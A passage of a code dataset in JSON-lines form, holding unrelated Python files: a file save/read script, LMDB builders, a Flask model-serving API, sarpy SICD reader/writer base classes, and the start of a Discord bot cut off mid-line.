save_writing(rp_lt,line, score):\n date = time.strftime(\"%d_%m-%H_%M_%S\")\n monfichier = open((date)+'.txt', 'w')\n\n for x in rp_lt:\n x = str(x)\n monfichier.write(x)\n monfichier.write(\"\\n\")\n\n monfichier.close\n\n print(\"Data got success fully saved\")\n\n\ndef save_reading():\n monfichier = open('save.txt', 'r')\n\n line = monfichier.readline()\n score = monfichier.readline()\n\n monfichier.close\n\n return line,score\n\n\n\n\nnt = str(input(\"w or r\"))\n\nif nt==\"w\":\n save_writing(rp_lt,line, score)\n\nif nt==\"r\":\n line, score = save_reading()\n print(line,score)\n\n","sub_path":"sav.py","file_name":"sav.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"103429148","text":"# coding=utf-8\n\nimport sys\nimport os\nimport lmdb\nimport numpy as np\nfrom train_vqvae import get_key_path\n\n\ndef build_lmdb_from_encode_result(args):\n input_dir = args[0]\n output_dir = args[1]\n\n lmdb_env = lmdb.open(output_dir, map_size=1099511627776)\n txn = lmdb_env.begin(write=True)\n\n linecnt = 0\n for f in os.listdir(input_dir):\n if f.startswith(\".\"):\n continue\n for line in open(os.path.join(input_dir, f)):\n linecnt += 1\n if linecnt % 10000 == 0:\n print(\"{} done\".format(linecnt), file=sys.stderr, flush=True)\n arr = line.rstrip(\"\\r\\n\").split(\"\\t\")\n key = arr[0]\n val = np.asarray([int(x) for x in arr[1].split(\",\")], dtype=np.int16)\n txn.put(key.encode(\"utf-8\"), val.tobytes())\n txn.commit()\n lmdb_env.close()\n\n\ndef build_img_lmdb(args):\n img_root_path = args[0]\n img_key_list_file = args[1]\n output_dir = args[2]\n\n lmdb_env = lmdb.open(output_dir, map_size=1099511627776)\n txn = lmdb_env.begin(write=True)\n\n linecnt = 0\n commit_cache = 0\n for line in open(img_key_list_file):\n linecnt += 1\n if linecnt % 10000 == 0:\n print(\"{} done\".format(linecnt), file=sys.stderr, flush=True)\n img_key = line.strip()\n key_enc = img_key.encode(\"utf-8\")\n img_path = get_key_path(img_root_path, img_key)\n try:\n img = open(img_path, \"rb\").read()\n except:\n continue\n txn.put(key_enc, img)\n commit_cache += 1\n if commit_cache > 10000:\n txn.commit()\n txn = lmdb_env.begin(write=True)\n commit_cache = 0\n txn.commit()\n lmdb_env.close()\n\n\nif __name__ == \"__main__\":\n globals()[sys.argv[1]](sys.argv[2:])","sub_path":"lmdb_utils.py","file_name":"lmdb_utils.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"203649000","text":"import argparse\nfrom flask import Flask, jsonify, request, render_template, send_from_directory\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\n\nfrom scripts.supervised_model_utils import load_model, score_model, train_model\nfrom scripts import ROOT_DIR, AVAILABLE_COUNTRIES\n\nLOG_DIR = os.path.join(ROOT_DIR, \"logs\")\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef landing():\n return \"Hi there!\"\n\n\n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n \"\"\"\n basic predict function for the API\n \"\"\"\n\n # input checking\n if not request.json:\n print(\"ERROR: API (predict): did not receive request data.\")\n return jsonify([])\n\n if 'query' not in request.json:\n print(\"ERROR API (predict): received request, but no 'query' found within.\")\n return jsonify([])\n\n if not isinstance(request.json[\"query\"], list):\n print(\"ERROR API (predict): query must be a list containing a dictionary having 'country'\"\n \" and 'starting_dates' as keys.\")\n return jsonify([])\n\n if not isinstance(request.json[\"query\"][0], dict):\n print(\"ERROR API (predict): query must be a list containing a dictionary having 'country'\"\n \" and 'starting_dates' as keys.\")\n return jsonify([])\n\n if \"country\" not in request.json[\"query\"][0]:\n print(\"ERROR API (predict): missing 'country' specification.\")\n return jsonify([])\n\n if request.json[\"query\"][0][\"country\"] not in AVAILABLE_COUNTRIES:\n print(\"ERROR API (predict): acceptable countries are\", *AVAILABLE_COUNTRIES)\n return jsonify([])\n\n if \"starting_dates\" not in request.json[\"query\"][0]:\n print(\"ERROR API (predict): missing 'starting_dates' specification.\")\n return jsonify([])\n\n try:\n _ = [pd.Timestamp(sd) for sd in request.json[\"query\"][0][\"starting_dates\"]]\n except ValueError:\n print(\"ERROR API (predict): 'starting_dates' cannot be parsed correctly as dates.\")\n return jsonify([])\n\n # extract the query\n query = request.json['query'][0]\n\n try:\n model, model_name = load_model(country_name=query['country'])\n except FileNotFoundError:\n print(\"ERROR: no model is available for this country. Train a model and retry.\")\n return jsonify([])\n\n _result = score_model(query['starting_dates'], model_name)\n result = []\n\n # convert numpy objects to ensure they are serializable\n for item in _result:\n if isinstance(item, np.ndarray):\n result.append(item.tolist())\n else:\n result.append(item)\n\n return jsonify(result)\n\n\n@app.route('/train', methods=['GET', 'POST'])\ndef train():\n\n # check for request data\n if not request.json:\n print(\"ERROR: API (train): did not receive request data.\")\n return jsonify(False)\n\n if 'query' not in request.json:\n print(\"ERROR API (train): received request, but no 'query' found within.\")\n return jsonify([])\n\n if 'country' not in request.json['query'][0]:\n print(\"ERROR API (train): missing 'country' field in query.\")\n return jsonify([])\n\n if request.json[\"query\"][0][\"country\"] not in AVAILABLE_COUNTRIES:\n print(\"ERROR API (predict): acceptable countries are\", *AVAILABLE_COUNTRIES)\n return jsonify([])\n\n query = request.json['query'][0]\n\n test = query.get('test')\n if test is None:\n test = False\n\n model = train_model(query['country'], query.get('param_dim'), test)\n print(\"... training complete\")\n\n return jsonify(True)\n\n\n@app.route('/logs/', methods=['GET'])\ndef logs(filename):\n \"\"\"\n API endpoint to get logs\n \"\"\"\n if not re.search(\".log\", filename):\n print(\"ERROR: API (log): file requested was not a log file: {}.\".format(filename))\n return jsonify([])\n\n if not os.path.isdir(LOG_DIR):\n print(\"ERROR: API (log): cannot find log dir.\")\n return jsonify([])\n\n file_path = os.path.join(LOG_DIR, filename)\n if not os.path.exists(file_path):\n print(\"ERROR: API (log): file requested could not be found: {}.\".format(filename))\n return jsonify([])\n\n return send_from_directory(LOG_DIR, filename, as_attachment=True)\n\n\nif __name__ == '__main__':\n\n # parse arguments for debug mode\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-d\", \"--debug\", action=\"store_true\", help=\"debug flask\")\n args = vars(ap.parse_args())\n\n if args[\"debug\"]:\n app.run(debug=True, port=8080)\n else:\n app.run(host='0.0.0.0', threaded=True, port=8080)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"119722687","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThe base elements for reading and writing complex data files.\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport logging\nfrom typing import Union, Tuple\n\nimport numpy\n\nfrom .sicd_elements.SICD import SICDType\nfrom .sicd_elements.ImageCreation import ImageCreationType\nfrom ...__about__ import __title__, __version__\n\ninteger_types = (int, )\nint_func = int\nif sys.version_info[0] < 3:\n # noinspection PyUnresolvedReferences\n int_func = long # to accommodate 32-bit python 2\n # noinspection PyUnresolvedReferences\n integer_types = (int, long)\n\n__classification__ = \"UNCLASSIFIED\"\n__author__ = \"Thomas McCullough\"\n\n\nclass BaseChipper(object):\n \"\"\"\n Base class defining basic functionality for the literal extraction of data\n from a file. The intent of this class is to be a callable in the following form:\n :code:`data = BaseChipper(entry1, entry2)`, where each entry is a tuple or\n int of the form `[[[start], stop,] step]`.\n\n Similarly, we are able to use more traditional Python slicing syntax\n\n .. code-block::\n\n data = BaseChipper[slice1[, slice2]]\n\n **Extension Requirement:** This provides the basic implementation for the work\n flow, but it is **required** that any extension provide a concrete implementation\n for actually reading from the raw file in `read_raw_fun`.\n\n **Extension Consideration:** It is possible that the basic functionality for\n conversion of raw data to complex data requires something more nuanced than\n the default provided in the `_data_to_complex` method.\n \"\"\"\n __slots__ = ('_data_size', '_complex_type', '_symmetry')\n\n def __init__(self, data_size, symmetry=(False, False, False), complex_type=False):\n \"\"\"\n\n Parameters\n ----------\n data_size : tuple\n The full size of the data *after* any required transformation. See\n `data_size` property.\n symmetry : tuple\n Describes any required data transformation. See the `symmetry` property.\n complex_type : callable|bool\n For complex type handling.\n If callable, then this is expected to transform the raw data to the complex data.\n If this evaluates to `True`, then the assumption is that real/imaginary\n components are stored in adjacent bands, which will be combined into a\n single band upon extraction.\n \"\"\"\n\n if not (isinstance(complex_type, bool) or callable(complex_type)):\n raise ValueError('complex-type must be a boolean or a callable')\n self._complex_type = complex_type\n\n if not isinstance(symmetry, tuple):\n symmetry = tuple(symmetry)\n if len(symmetry) != 3:\n raise ValueError(\n 'The symmetry parameter must have length 3, and got {}.'.format(symmetry))\n self._symmetry = tuple([bool(entry) for entry in symmetry])\n\n if not isinstance(data_size, tuple):\n data_size = tuple(data_size)\n if len(data_size) != 2:\n raise ValueError(\n 'The data_size parameter must have length 2, and got {}.'.format(data_size))\n data_size = (int_func(data_size[0]), int_func(data_size[1]))\n if data_size[0] < 0 or data_size[1] < 0:\n raise ValueError('All entries of data_size {} must be non-negative.'.format(data_size))\n if self._symmetry[2]:\n self._data_size = (data_size[1], data_size[0])\n else:\n self._data_size = data_size\n\n @property\n def symmetry(self):\n \"\"\"\n Tuple[bool, bool, bool]: Entries of the form (`flip1`, `flip2`, `swap_axes`).\n This describes necessary symmetry transformation to be performed to convert\n from raw (file storage) order into the order expected (analysis order).\n\n * `flip1=True` - we reverse order in the first axis, wrt raw order.\n\n * `flip2=True` - we reverse order in the second axis, wrt raw order).\n\n * `swap_axes=True` - we switch the two axes, after any required flipping.\n \"\"\"\n\n return self._symmetry\n\n @property\n def data_size(self):\n \"\"\"\n Tuple[int, int]: Two element tuple of the form `(rows, columns)`, which provides the\n size of the data, after any necessary symmetry transformations have been applied.\n Note that this excludes the number of bands in the image.\n \"\"\"\n\n return self._data_size\n\n def __call__(self, range1, range2):\n \"\"\"\n Reads and fetches data. Note that :code:`chipper(range1, range2)` is an alias\n for :code:`chipper.read_chip(range1, range2)`.\n\n Parameters\n ----------\n range1 : None|int|tuple\n range2 : none|int|tuple\n\n Returns\n -------\n numpy.ndarray\n \"\"\"\n\n data = self._read_raw_fun(range1, range2)\n data = self._data_to_complex(data)\n\n # make a one band image flat\n if data.ndim == 3 and data.shape[2] == 1:\n data = numpy.reshape(data, data.shape[:-1])\n\n data = self._reorder_data(data)\n return data\n\n def __getitem__(self, item):\n \"\"\"\n Reads and returns data using more traditional to python slice functionality.\n After slice interpretation, this is analogous to :func:`__call__` or :func:`read_chip`.\n\n Parameters\n ----------\n item : None|int|slice|tuple\n\n Returns\n -------\n numpy.ndarray\n \"\"\"\n\n range1, range2 = self._slice_to_args(item)\n return self.__call__(range1, range2)\n\n @staticmethod\n def _slice_to_args(item):\n # type: (Union[None, int, slice, tuple]) -> tuple\n def parse(entry):\n if isinstance(entry, integer_types):\n return entry, entry+1, 1\n if isinstance(entry, slice):\n return entry.start, entry.stop, entry.step\n\n # this input is assumed to come from slice parsing\n if isinstance(item, tuple) and len(item) > 2:\n raise ValueError(\n 'Chipper received slice argument {}. We cannot slice on more than two dimensions.'.format(item))\n if isinstance(item, tuple):\n return parse(item[0]), parse(item[1])\n else:\n return parse(item), None\n\n def _reorder_arguments(self, range1, range2):\n \"\"\"\n Reinterpret the range arguments into actual \"physical\" arguments of memory,\n in light of the symmetry attribute.\n\n Parameters\n ----------\n range1 : None|int|tuple\n * if `None`, then the range is not limited in first axis\n * if `int` = step size\n * if (`int`, `int`) = `end`, `step size`\n * if (`int`, `int`, `int`) = `start`, `stop`, `step size`\n range2 : None|int|tuple\n same as `range1`, except for the second axis.\n\n Returns\n -------\n None|int|tuple\n actual range 1 - in light of `range1`, `range2` and symmetry\n None|int|tuple\n actual range 2 - in light of `range1`, `range2` and symmetry\n \"\"\"\n\n def extract(arg, siz):\n start, stop, step = None, None, None\n if isinstance(arg, integer_types):\n step = arg\n else:\n # NB: following this pattern to avoid confused pycharm inspection\n if len(arg) == 1:\n step = arg[0]\n elif len(arg) == 2:\n stop, step = arg\n elif len(arg) == 3:\n start, stop, step = arg\n start = 0 if start is None else int_func(start)\n stop = siz if stop is None else int_func(stop)\n step = 1 if step is None else int_func(step)\n # basic validity check\n if not (-siz < start < siz):\n raise ValueError(\n 'Range argument {} has extracted start {}, which is required '\n 'to be in the range [0, {})'.format(arg, start, siz))\n if not (-siz < stop <= siz):\n raise ValueError(\n 'Range argument {} has extracted \"stop\" {}, which is required '\n 'to be in the range [0, {}]'.format(arg, stop, siz))\n if not ((0 < step < siz) or (-siz < step < 0)):\n raise ValueError(\n 'Range argument {} has extracted step {}, for an axis of length '\n '{}'.format(arg, start, siz))\n if ((step < 0) and (stop > start)) or ((step > 0) and (start > stop)):\n raise ValueError(\n 'Range argument {} has extracted start {}, stop {}, step {}, '\n 'which is not valid.'.format(arg, start, stop, step))\n\n # reform negative values for start/stop appropriately\n if start < 0:\n start += siz\n if stop < 0:\n stop += siz\n return start, stop, step\n\n def reverse_arg(arg, siz):\n start, stop, step = extract(arg, siz)\n # read backwards\n return (siz - 1) - start, (siz - 1) - stop, -step\n\n if isinstance(range1, (numpy.ndarray, list)):\n range1 = tuple(range1)\n if isinstance(range2, (numpy.ndarray, list)):\n range2 = tuple(range2)\n\n if not (range1 is None or isinstance(range1, integer_types) or isinstance(range1, tuple)):\n raise TypeError('range1 is of type {}, but must be an instance of None, '\n 'int or tuple.'.format(range1))\n if isinstance(range1, tuple) and len(range1) > 3:\n raise TypeError('range1 must have no more than 3 entries, received {}.'.format(range1))\n\n if not (range2 is None or isinstance(range2, integer_types) or isinstance(range2, tuple)):\n raise TypeError('range2 is of type {}, but must be an instance of None, '\n 'int or tuple.'.format(range2))\n if isinstance(range2, tuple) and len(range2) > 3:\n raise TypeError('range2 must have no more than 3 entries, received {}.'.format(range2))\n\n # validate the first range\n if self._symmetry[0]:\n real_arg1 = reverse_arg(range1, self._data_size[0])\n else:\n real_arg1 = extract(range1, self._data_size[0])\n # validate the second range\n if self._symmetry[1]:\n real_arg2 = reverse_arg(range2, self._data_size[1])\n else:\n real_arg2 = extract(range2, self._data_size[1])\n\n # switch the axes symmetry dictates\n real_arg1, real_arg2 = (real_arg2, real_arg1) if self._symmetry[2] else (real_arg1, real_arg2)\n return real_arg1, real_arg2\n\n def _data_to_complex(self, data):\n # type: (numpy.ndarray) -> numpy.ndarray\n if callable(self._complex_type):\n return self._complex_type(data) # is this actually necessary?\n elif self._complex_type:\n out = numpy.zeros((data.shape[0], data.shape[1], int_func(data.shape[2]/2)), dtype=numpy.complex64)\n out.real = data[:, :, 0::2]\n out.imag = data[:, :, 1::2]\n return out\n else:\n # nothing to be done\n return data\n\n def _reorder_data(self, data):\n # type: (numpy.ndarray) -> numpy.ndarray\n if self._symmetry[2]:\n data = numpy.swapaxes(data, 1, 0)\n return data\n\n def _read_raw_fun(self, range1, range2):\n \"\"\"\n Reads data as stored in a file, before any complex data and symmetry\n transformations are applied. The one potential exception to the \"raw\"\n file orientation of the data is that bands will always be returned in the\n first dimension (data[n,:,:] is the nth band -- \"band sequential\" or BSQ,\n as stored in Python's memory), regardless of how the data is stored in\n the file.\n\n Parameters\n ----------\n range1 : None|int|tuple\n * if `None`, then the range is not limited in first axis\n * if `int` = step size\n * if (`int`, `int`) = `end`, `step size`\n * if (`int`, `int`, `int`) = `start`, `stop`, `step size`\n range2 : None|int|tuple\n same as `range1`, except for the second axis.\n\n Returns\n -------\n numpy.ndarray\n the (mostly) raw data read from the file\n \"\"\"\n\n # Should generally begin as:\n # arange1, arange2 = self._reorder_arguments(range1, range2)\n\n raise NotImplementedError\n\n\nclass SubsetChipper(BaseChipper):\n \"\"\"\n Permits transparent extraction from a particular subset of the possible data range\n \"\"\"\n\n __slots__ = ('_data_size', '_complex_type', '_symmetry', 'shift1', 'shift2', 'parent_chipper')\n\n def __init__(self, parent_chipper, dim1bounds, dim2bounds):\n \"\"\"\n\n Parameters\n ----------\n parent_chipper : BaseChipper\n dim1bounds : numpy.ndarray|list|tuple\n dim2bounds: numpy.ndarray|list|tuple\n \"\"\"\n\n if not isinstance(parent_chipper, BaseChipper):\n raise TypeError('parent_chipper is required to be an instance of BaseChipper, '\n 'got type {}'.format(type(parent_chipper)))\n\n data_size = (dim1bounds[1] - dim1bounds[0], dim2bounds[1] - dim2bounds[0])\n self.shift1 = dim1bounds[0]\n self.shift2 = dim2bounds[0]\n self.parent_chipper = parent_chipper\n super(SubsetChipper, self).__init__(data_size, symmetry=(False, False, False), complex_type=False)\n\n def _reformat_bounds(self, range1, range2):\n def _get_start(entry, shift, bound):\n if entry is None:\n return shift\n entry = int_func(entry)\n if -bound < entry < 0:\n return shift + bound + entry\n elif 0 <= entry < bound:\n return shift + entry\n raise ValueError(\n 'Got slice start entry {}, which must be in the range '\n '({}, {})'.format(entry, -bound, bound))\n\n def _get_end(entry, shift, bound):\n if entry is None:\n return shift\n entry = int_func(entry)\n if -bound <= entry < 0:\n return shift + bound + entry\n elif 0 <= entry <= bound:\n return shift + entry\n raise ValueError(\n 'Got slice end entry {}, which must be in the range '\n '[{}, {}]'.format(entry, -bound, bound))\n\n def _get_range(rng, shift, bound):\n return (\n _get_start(rng[0], shift, bound),\n _get_end(rng[1], shift, bound),\n rng[2])\n arange1 = _get_range(range1, self.shift1, self._data_size[0])\n arange2 = _get_range(range2, self.shift2, self._data_size[1])\n return arange1, arange2\n\n def _read_raw_fun(self, range1, range2):\n arange1, arange2 = self._reformat_bounds(range1, range2)\n return self.parent_chipper.__call__(arange1, arange2)\n\n\nclass BaseReader(object):\n \"\"\"\n Abstract file reader class\n \"\"\"\n\n __slots__ = ('_sicd_meta', '_chipper', '_data_size')\n\n def __init__(self, sicd_meta, chipper):\n \"\"\"\n\n Parameters\n ----------\n sicd_meta : SICDType|Tuple[SICDType]\n the SICD metadata object, or tuple of objects\n chipper : BaseChipper|Tuple[BaseChipper]\n a chipper object, or tuple of chipper objects\n \"\"\"\n\n if isinstance(sicd_meta, list):\n sicd_meta = tuple(sicd_meta)\n if isinstance(chipper, list):\n chipper = tuple(chipper)\n\n if sicd_meta is None:\n pass\n elif isinstance(sicd_meta, tuple):\n for el in sicd_meta:\n if not isinstance(el, SICDType):\n raise TypeError(\n 'Got a collection for sicd_meta, and all elements are required '\n 'to be instances of SICDType.')\n elif not isinstance(sicd_meta, SICDType):\n raise TypeError('sicd_meta argument is required to be a SICDType, or collection of SICDType objects')\n\n if isinstance(chipper, tuple):\n for el in chipper:\n if not isinstance(el, BaseChipper):\n raise TypeError(\n 'Got a collection for chipper, and all elements are required '\n 'to be instances of BaseChipper.')\n elif not isinstance(chipper, BaseChipper):\n raise TypeError(\n 'chipper argument is required to be a BaseChipper instance, or collection of BaseChipper objects')\n\n data_size = None\n if isinstance(sicd_meta, SICDType):\n if not isinstance(chipper, BaseChipper):\n raise ValueError('sicd_meta is a single SICDType, so chipper must be a single BaseChipper')\n data_size = chipper.data_size\n elif isinstance(sicd_meta, tuple):\n if not (isinstance(chipper, tuple) and len(chipper) == len(sicd_meta)):\n raise ValueError('sicd_meta is a collection, so chipper must be a collection of the same size.')\n data_size = tuple(el.data_size for el in chipper)\n self._sicd_meta = sicd_meta\n self._chipper = chipper\n self._data_size = data_size\n\n @property\n def sicd_meta(self):\n \"\"\"\n SICDType|Tuple[SICDType]: the sicd meta_data or meta_data collection.\n \"\"\"\n\n return self._sicd_meta\n\n @property\n def data_size(self):\n \"\"\"\n Tuple[int, int]|Tuple[Tuple[int, int], ...]: the data size(s) of the form (rows, cols).\n \"\"\"\n\n return self._data_size\n\n def get_sicds_as_tuple(self):\n \"\"\"\n Get the sicd or sicd collection as a tuple - for simplicity and consistency of use.\n\n Returns\n -------\n Tuple[SICDType]\n \"\"\"\n\n if self._sicd_meta is None:\n return None\n elif isinstance(self._sicd_meta, tuple):\n return self._sicd_meta\n else:\n # noinspection PyRedundantParentheses\n return (self._sicd_meta, )\n\n def get_data_size_as_tuple(self):\n \"\"\"\n Get the data size wrapped in a tuple - for simplicity and ease of use.\n\n Returns\n -------\n Tuple[Tuple[int, int]]\n \"\"\"\n\n if self._sicd_meta is None:\n return None\n elif isinstance(self._sicd_meta, tuple):\n return self._data_size\n else:\n # noinspection PyRedundantParentheses\n return (self._data_size, )\n\n def _validate_index(self, index):\n if isinstance(self._chipper, BaseChipper) or index is None:\n return 0\n\n index = int(index)\n siz = len(self._chipper)\n if not (-siz < index < siz):\n raise ValueError('index must be in the range ({}, {})'.format(-siz, siz))\n return index\n\n def _validate_slice(self, item):\n if isinstance(item, tuple):\n if len(item) > 3:\n raise ValueError(\n 'Reader received slice argument {}. We cannot slice on more than '\n 'three dimensions.'.format(item))\n if len(item) == 3:\n index = item[2]\n if not isinstance(index, integer_types):\n raise ValueError('Cannot slice in multiple indices on the third dimension.')\n index = self._validate_index(index)\n return item[:2], index\n return item, 0\n\n def __call__(self, range1, range2, index=0):\n \"\"\"\n Reads and fetches data. Note that :code:`reader(range1, range2, index)` is an alias\n for :code:`reader.read_chip(range1, range2, index)`.\n\n Parameters\n ----------\n range1 : None|int|tuple\n range2 : None|int|tuple\n index : None|int\n\n Returns\n -------\n numpy.ndarray\n \"\"\"\n\n if isinstance(self._chipper, tuple):\n index = self._validate_index(index)\n return self._chipper[index](range1, range2)\n else:\n return self._chipper(range1, range2)\n\n def __getitem__(self, item):\n \"\"\"\n Reads and returns data using more traditional to python slice functionality.\n After slice interpretation, this is analogous to :func:`__call__` or :func:`read_chip`.\n\n Parameters\n ----------\n item : None|int|slice|tuple\n\n Returns\n -------\n numpy.ndarray\n \"\"\"\n\n item, index = self._validate_slice(item)\n if isinstance(self._chipper, tuple):\n return self._chipper[index].__getitem__(item)\n else:\n return self._chipper.__getitem__(item)\n\n def read_chip(self, dim1range, dim2range, index=None):\n \"\"\"\n Read the given section of data as an array.\n\n Parameters\n ----------\n dim1range : None|int|Tuple[int, int]|Tuple[int, int, int]\n The row data selection of the form `[start, [stop, [stride]]]`, and\n `None` defaults to all rows (i.e. `(0, NumRows, 1)`)\n dim2range : None|int|Tuple[int, int]|Tuple[int, int, int]\n The column data selection of the form `[start, [stop, [stride]]]`, and\n `None` defaults to all rows (i.e. `(0, NumCols, 1)`)\n index : int|None\n Relative to which sicd/chipper, and only used in the event of multiple\n sicd/chippers. Defaults to `0`, if not provided.\n\n Returns\n -------\n numpy.ndarray\n The complex data, explicitly of dtype=complex.64. Be sure to upcast to\n complex128 if so desired.\n\n Examples\n ------------\n :code:`data = reader.read_chip((start1, stop1, stride1), (start2, stop2, stride2))`\n\n Also available is basic call syntax\n\n .. code-block::\n\n data = reader(dim1range, dim2range, index).\n\n Another alternative is slice syntax\n\n .. code-block:: python\n\n data = reader[start1:stop1:stride1, start:stop:stride] # or\n data = reader[start:stop:stride, start:stop:stride, index]\n\n Here the slice on index (dimension 3) is limited to a single integer, and\n no slice on index :code:`reader[:, :]` will default to `index=0`,\n :code:`reader[:, :, 0]` (where appropriate).\n \"\"\"\n\n if isinstance(self._chipper, tuple):\n index = self._validate_index(index)\n return self._chipper[index](dim1range, dim2range)\n else:\n return self._chipper(dim1range, dim2range)\n\n def get_suggestive_name(self, frame=None):\n \"\"\"\n Get a suggestive name for the frame in question.\n\n Parameters\n ----------\n frame : None|int\n Defaults to the first frame.\n\n Returns\n -------\n str\n \"\"\"\n\n if frame is None:\n frame = 0\n else:\n frame = int_func(frame)\n the_sicd = self._sicd_meta if isinstance(self._sicd_meta, SICDType) else self._sicd_meta[frame]\n core_name = ''\n try:\n core_name += the_sicd.CollectionInfo.CoreName\n except (AttributeError, ValueError, TypeError):\n core_name = 'UnknownCoreName'\n\n pols = ''\n try:\n pols += re.sub(':', '', the_sicd.ImageFormation.TxRcvPolarizationProc)\n except (AttributeError, ValueError, TypeError):\n pols = 'UnknownPolarization'\n return '{}_{}_SICD.nitf'.format(core_name, pols)\n\n\nclass SubsetReader(BaseReader):\n \"\"\"Permits extraction from a particular subset of the possible data range\"\"\"\n __slots__ = ('_parent_reader', )\n\n def __init__(self, parent_reader, sicd_meta, dim1bounds, dim2bounds):\n \"\"\"\n\n Parameters\n ----------\n parent_reader : BaseReader\n sicd_meta : SICDType\n dim1bounds : tuple\n dim2bounds : tuple\n \"\"\"\n\n self._parent_reader = parent_reader\n # noinspection PyProtectedMember\n chipper = SubsetChipper(parent_reader._chipper, dim1bounds, dim2bounds)\n super(SubsetReader, self).__init__(sicd_meta, chipper)\n\n\nclass AbstractWriter(object):\n \"\"\"Abstract file writer class for SICD data\"\"\"\n __slots__ = ('_file_name', )\n\n def __init__(self, file_name):\n \"\"\"\n\n Parameters\n ----------\n file_name : str\n \"\"\"\n\n self._file_name = file_name\n if not os.path.exists(self._file_name):\n with open(self._file_name, 'wb') as fi:\n fi.write(b'')\n\n def close(self):\n \"\"\"\n Completes any necessary final steps.\n\n Returns\n -------\n None\n \"\"\"\n\n pass\n\n def write_chip(self, data, start_indices=(0, 0)):\n \"\"\"\n Write the data to the file(s). This is an alias to :code:`writer(data, start_indices)`.\n\n Parameters\n ----------\n data : numpy.ndarray\n the complex data\n start_indices : tuple[int, int]\n the starting index for the data.\n\n Returns\n -------\n None\n \"\"\"\n\n self.__call__(data, start_indices=start_indices)\n\n def __call__(self, data, start_indices=(0, 0)):\n \"\"\"\n Write the data to the file(s).\n\n Parameters\n ----------\n data : numpy.ndarray\n the complex data\n start_indices : Tuple[int, int]\n the starting index for the data.\n\n Returns\n -------\n None\n \"\"\"\n\n raise NotImplementedError\n\n def __del__(self):\n self.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n if exception_type is None:\n self.close()\n else:\n logging.error(\n 'The {} file writer generated an exception during processing. The file {} may be '\n 'only partially generated and corrupt.'.format(self.__class__.__name__, self._file_name))\n # The exception will be reraised.\n # It's unclear how any exception could be caught.\n\n\nclass BaseWriter(AbstractWriter):\n \"\"\"\n Abstract file writer class for SICD data\n \"\"\"\n\n __slots__ = ('_file_name', '_sicd_meta', )\n\n def __init__(self, file_name, sicd_meta):\n \"\"\"\n\n Parameters\n ----------\n file_name : str\n sicd_meta : SICDType\n \"\"\"\n\n super(BaseWriter, self).__init__(file_name)\n if not isinstance(sicd_meta, SICDType):\n raise ValueError('sicd_meta is required to be an instance of SICDType, got {}'.format(type(sicd_meta)))\n if sicd_meta.ImageData is None:\n raise ValueError('The sicd_meta has un-populated ImageData, and nothing useful can be inferred.')\n if sicd_meta.ImageData.NumCols is None or sicd_meta.ImageData.NumRows is None:\n raise ValueError('The sicd_meta has ImageData with unpopulated NumRows or NumCols, '\n 'and nothing useful can be inferred.')\n if sicd_meta.ImageData.PixelType is None:\n logging.warning('The PixelType for sicd_meta is unset, so defaulting to RE32F_IM32F.')\n sicd_meta.ImageData.PixelType = 'RE32F_IM32F'\n self._sicd_meta = sicd_meta.copy()\n\n profile = '{} {}'.format(__title__, __version__)\n if self._sicd_meta.ImageCreation is None:\n self._sicd_meta.ImageCreation = ImageCreationType(\n Application=profile,\n DateTime=numpy.datetime64('now', 'us'),\n Profile=profile)\n else:\n self._sicd_meta.ImageCreation.Profile = profile\n\n @property\n def sicd_meta(self):\n \"\"\"\n SICDType: the sicd metadata\n \"\"\"\n\n return self._sicd_meta\n\n def __call__(self, data, start_indices=(0, 0)):\n raise NotImplementedError\n","sub_path":"sarpy/io/complex/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":27979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"20438195","text":"import discord\r\nimport time\r\nimport os\r\nimport bosslist\r\nimport armod\r\nimport random\r\n\r\nfrom discord.ext import commands\r\n\r\nclient = commands.Bot(command_prefix = \".\")\r\n\r\n\r\nmaster = 100\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('bot is ready')\r\n'''\r\n@client.event\r\nasync def on_message(message):\r\n if message.author.id == client.user.id:\r\n return \r\n'''\r\n@client.command()\r\nasync def roll(ctx):\r\n await ctx.send(random.randint(0,6))\r\n\r\n@client.command()\r\nasync def ping(ctx):\r\n await ctx.send(f'Pong! {round(client.latency*1000)}ms')\r\n\r\n@client.command(aliases=['等下甚麼王','nextboss','boss'])\r\nasync def _boss(ctx):\r\n dayOfhour=int(time.strftime(\"%H\", time.localtime()))\r\n dayOfWeek=time.strftime(\"%a\", time.localtime())\r\n dayOfmin=int(time.strftime(\"%M\",time.localtime()))\r\n ans=bosslist.whichboss(dayOfWeek,dayOfhour,dayOfmin)\r\n print(dayOfWeek,dayOfhour,dayOfmin) \r\n standtime=ans.find(':')\r\n hourtime=int(ans[0:standtime])\r\n minstime=int(ans[standtime+1:standtime+3]) \r\n bosslist.distance(dayOfhour,dayOfmin,hourtime,minstime)\r\n h1=bosslist.distance(dayOfhour,dayOfmin,hourtime,minstime)[0]\r\n m1=bosslist.distance(dayOfhour,dayOfmin,hourtime,minstime)[1]\r\n \r\n await ctx.send(f'{ans}\\n 還有{h1}小時{m1}分')\r\n #\r\n \r\n@client.command()\r\nasync def ar(ctx,*,lear=None):\r\n if lear!=None: \r\n #學習\r\n await ctx.send(armod.learning(lear))\r\n else:\r\n text=armod.says() \r\n await ctx.send(text)\r\n\r\n@client.command(aliases=['OK還錢','夢夢還錢','告娃娃還錢','AR還錢','ar還錢'])\r\nasync def _i(ctx): \r\n await 